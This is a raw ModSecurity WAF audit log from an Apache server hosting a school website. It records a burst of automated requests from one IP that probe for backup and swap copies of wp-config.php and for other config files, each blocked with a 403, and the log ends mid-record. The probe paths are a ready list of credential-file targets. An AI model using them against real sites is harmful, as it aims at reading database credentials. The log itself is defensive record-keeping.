smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 Accept: */* --1c1d8633-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c1d8633-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935779169855 12927 (- - -) Stopwatch2: 1744935779169855 12927; combined=24766, p1=214, p2=0, p3=0, p4=0, p5=12298, sr=64, sw=0, l=0, gc=12254 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c1d8633-Z-- --207b851f-A-- [18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQQgAAAIA 103.236.140.4 52366 103.236.140.4 8181 --207b851f-B-- GET /wp-config.php.backup HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Accept: */* --207b851f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --207b851f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935779204813 732 (- - -) Stopwatch2: 1744935779204813 732; combined=274, p1=241, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --207b851f-Z-- --ef981949-A-- [18/Apr/2025:07:22:59 +0700] aAGbYzlhhbF_BYhFYTXhEwAAAE4 103.236.140.4 52370 103.236.140.4 8181 --ef981949-B-- GET /wp-config.php_bck HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Accept: */* --ef981949-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef981949-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935779506812 689 (- - -) Stopwatch2: 1744935779506812 689; combined=263, p1=230, p2=0, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef981949-Z-- --c66c8e22-A-- [18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQRAAAAJg 103.236.140.4 52372 103.236.140.4 8181 --c66c8e22-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36 Accept: */* --c66c8e22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c66c8e22-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935779537896 653 (- - -) Stopwatch2: 1744935779537896 653; combined=249, p1=218, p2=0, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c66c8e22-Z-- --ca9b1523-A-- [18/Apr/2025:07:23:00 +0700] aAGbZDlhhbF_BYhFYTXhGAAAAFY 103.236.140.4 52388 103.236.140.4 8181 --ca9b1523-B-- GET /.wp-config.php.swp HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2 Accept: */* --ca9b1523-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca9b1523-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935780868248 747 (- - -) Stopwatch2: 1744935780868248 747; combined=302, p1=270, p2=0, p3=0, p4=0, p5=32, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca9b1523-Z-- --fcbe675d-A-- [18/Apr/2025:07:23:00 +0700] aAGbZFyj-eUTITfvHEUkCgAAAA0 103.236.140.4 52390 103.236.140.4 8181 --fcbe675d-B-- GET /wp-config.php.swo HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; BNTV600 Build/IMM76L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Safari/537.36 Accept: */* --fcbe675d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcbe675d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935780900094 785 (- - -) Stopwatch2: 1744935780900094 785; combined=346, p1=311, p2=0, p3=0, p4=0, p5=34, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcbe675d-Z-- --e6953331-A-- [18/Apr/2025:07:23:01 +0700] aAGbZRk6uTiIdxrJEES4kgAAAMs 103.236.140.4 52398 103.236.140.4 8181 --e6953331-B-- GET /wp-config.php_bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.3; WOW64; Trident/7.0) Accept: */* --e6953331-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6953331-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935781198126 832 (- - -) Stopwatch2: 1744935781198126 832; combined=367, p1=332, p2=0, p3=0, p4=0, p5=35, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6953331-Z-- --40a6ad1a-A-- [18/Apr/2025:07:23:01 +0700] aAGbZRk6uTiIdxrJEES4kwAAANE 103.236.140.4 52400 103.236.140.4 8181 --40a6ad1a-B-- GET /wp-config.php-bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 Accept: */* --40a6ad1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40a6ad1a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935781234512 707 (- - -) Stopwatch2: 1744935781234512 707; combined=304, p1=271, p2=0, p3=0, p4=0, p5=33, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40a6ad1a-Z-- --c96c3c30-A-- [18/Apr/2025:07:23:02 +0700] aAGbZhk6uTiIdxrJEES4lwAAAMM 103.236.140.4 52412 103.236.140.4 8181 --c96c3c30-B-- GET /wp-config.php.zip HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept: */* --c96c3c30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c96c3c30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935782080034 785 (- - -) Stopwatch2: 1744935782080034 785; combined=305, p1=270, p2=0, p3=0, p4=0, p5=35, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c96c3c30-Z-- --81bf9607-A-- [18/Apr/2025:07:23:04 +0700] aAGbaDlhhbF_BYhFYTXhHAAAAEc 103.236.140.4 52432 103.236.140.4 8181 --81bf9607-B-- GET /config.db HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: */* --81bf9607-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81bf9607-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".db"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744935784107321 2170 (- - -) Stopwatch2: 1744935784107321 2170; combined=709, p1=363, p2=313, p3=0, p4=0, p5=32, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81bf9607-Z-- --b8da3172-A-- [18/Apr/2025:07:23:04 +0700] aAGbaDlhhbF_BYhFYTXhHQAAAFg 103.236.140.4 52444 103.236.140.4 8181 --b8da3172-B-- GET /config.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 Accept: */* --b8da3172-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8da3172-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744935784946127 1855 (- - -) Stopwatch2: 1744935784946127 1855; combined=659, p1=339, p2=294, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8da3172-Z-- --16e04b10-A-- [18/Apr/2025:07:23:04 +0700] aAGbaDlhhbF_BYhFYTXhHgAAAEM 103.236.140.4 52446 103.236.140.4 8181 --16e04b10-B-- GET /config.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0 Accept: */* --16e04b10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16e04b10-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744935784980245 1901 (- - -) Stopwatch2: 1744935784980245 1901; combined=664, p1=324, p2=308, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16e04b10-Z-- --3c4df917-A-- [18/Apr/2025:07:23:05 +0700] aAGbaTpR4B6O-aqWibPQTAAAAJE 103.236.140.4 52448 103.236.140.4 8181 --3c4df917-B-- GET /config.db HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T217S Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36 Accept: */* --3c4df917-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c4df917-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".db"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744935785017980 1656 (- - -) Stopwatch2: 1744935785017980 1656; combined=651, p1=330, p2=293, p3=0, p4=0, p5=28, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c4df917-Z-- --6d3b8171-A-- [18/Apr/2025:07:23:05 +0700] aAGbaTpR4B6O-aqWibPQTQAAAJI 103.236.140.4 52452 103.236.140.4 8181 --6d3b8171-B-- GET /wp-config.php_old2010 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: */* --6d3b8171-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d3b8171-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935785332778 680 (- - -) Stopwatch2: 1744935785332778 680; combined=251, p1=220, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d3b8171-Z-- --6dd38d39-A-- [18/Apr/2025:07:23:05 +0700] aAGbaTpR4B6O-aqWibPQTgAAAI0 103.236.140.4 52458 103.236.140.4 8181 --6dd38d39-B-- GET /admin/wp-config.phpb HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGLK430 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Safari/537.36 Accept: */* --6dd38d39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6dd38d39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935785366102 699 (- - -) Stopwatch2: 1744935785366102 699; combined=286, p1=254, p2=0, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6dd38d39-Z-- --92a6507c-A-- [18/Apr/2025:07:23:05 +0700] aAGbaTpR4B6O-aqWibPQTwAAAJM 103.236.140.4 52460 103.236.140.4 8181 --92a6507c-B-- GET /admin/wp-config.php-old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H321 Accept: */* --92a6507c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92a6507c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935785398058 669 (- - -) Stopwatch2: 1744935785398058 669; combined=269, p1=237, p2=0, p3=0, p4=0, p5=32, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92a6507c-Z-- --5e653201-A-- [18/Apr/2025:07:23:05 +0700] aAGbaRk6uTiIdxrJEES4mwAAAMc 103.236.140.4 52462 103.236.140.4 8181 --5e653201-B-- GET /site/wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Accept: */* --5e653201-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e653201-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935785429141 800 (- - -) Stopwatch2: 1744935785429141 800; combined=312, p1=277, p2=0, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e653201-Z-- --2f815176-A-- [18/Apr/2025:07:23:05 +0700] aAGbaTlhhbF_BYhFYTXhHwAAAEw 103.236.140.4 52464 103.236.140.4 8181 --2f815176-B-- GET /wp/wp-config.php.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: */* --2f815176-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f815176-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935785464334 679 (- - -) Stopwatch2: 1744935785464334 679; combined=256, p1=218, p2=0, p3=0, p4=0, p5=38, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f815176-Z-- --5e845b75-A-- [18/Apr/2025:07:23:05 +0700] aAGbaTlhhbF_BYhFYTXhIAAAAEg 103.236.140.4 52466 103.236.140.4 8181 --5e845b75-B-- GET /wp-config.php~bk HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 Accept: */* --5e845b75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e845b75-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935785495762 765 (- - -) Stopwatch2: 1744935785495762 765; combined=255, p1=222, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e845b75-Z-- --02873e21-A-- [18/Apr/2025:07:23:05 +0700] 